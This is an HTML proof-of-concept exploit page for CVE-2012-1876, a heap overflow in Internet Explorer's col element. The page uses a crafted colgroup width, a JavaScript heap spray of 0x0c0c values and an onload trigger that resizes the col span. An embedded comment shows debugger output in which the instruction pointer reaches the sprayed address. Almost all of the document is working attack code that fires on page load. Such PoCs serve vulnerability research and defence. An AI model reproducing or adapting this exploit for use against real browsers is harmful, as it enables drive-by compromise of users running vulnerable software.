<html>
<head>
<title>CVE-2012-1876 PoC</title>
</head>
<body onload="_crash()">
<TABLE style="table-layout: fixed;">
<colgroup id="cg" width="2021161">
<col id="cl" span="2">
<col>
</colgroup>
<TR>
<TD>XXXX</TD>
</TR>
</TABLE>
<script>
/*******
CVE-2012-1876 IE col element heap overflow PoC
Canberk Bolat - cbolat.blogspot.com
cg\'s width = 2021161 (2021161 * 100 = 0c0c0c04) (Blink->Flink = cg\'s width)
(1014.1158): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c04 ebx=02e2bae8 ecx=008cdf88 edx=0c0c0c0c esi=008de480 edi=008983e0
eip=0c0c0c0c esp=02e2b9fc ebp=02e2ba9c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
0c0c0c0c 0c0c or al,0Ch
1:019> !heap -x 0c0c0c0c
List corrupted: (Flink->Blink = 0c0c0c04) != (Block = 00890850)
HEAP 00830000 (Seg 00830000) At 00890848 Error: block list entry corrupted
List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 0089d458)
HEAP 00830000 (Seg 00830000) At 0089d450 Error: block list entry corrupted
List corrupted: (Blink->Flink = 0c0c0c04) != (Block = 008a2f38)
HEAP 00830000 (Seg 00830000) At 008a2f30 Error: block list entry corrupted
ERROR: Block 008ccf90 previous size 36d3 does not match previous block size 12
HEAP 00830000 (Seg 00830000) At 008ccf90 Error: invalid block Previous
**********/
var targetObj = document.getElementById("cl");
function spray() {
for(S="\\u0c0c",k=[],y=0;y++<197;)y<20?S+=S:k[y]=["\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c" + S.substr(60) +"\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141\\u4141"].join("")
}
function _crash() {
spray();
//alert("OK");
targetObj.chOff = 10;
targetObj.span = 400;
}
</script>
</body>
</html>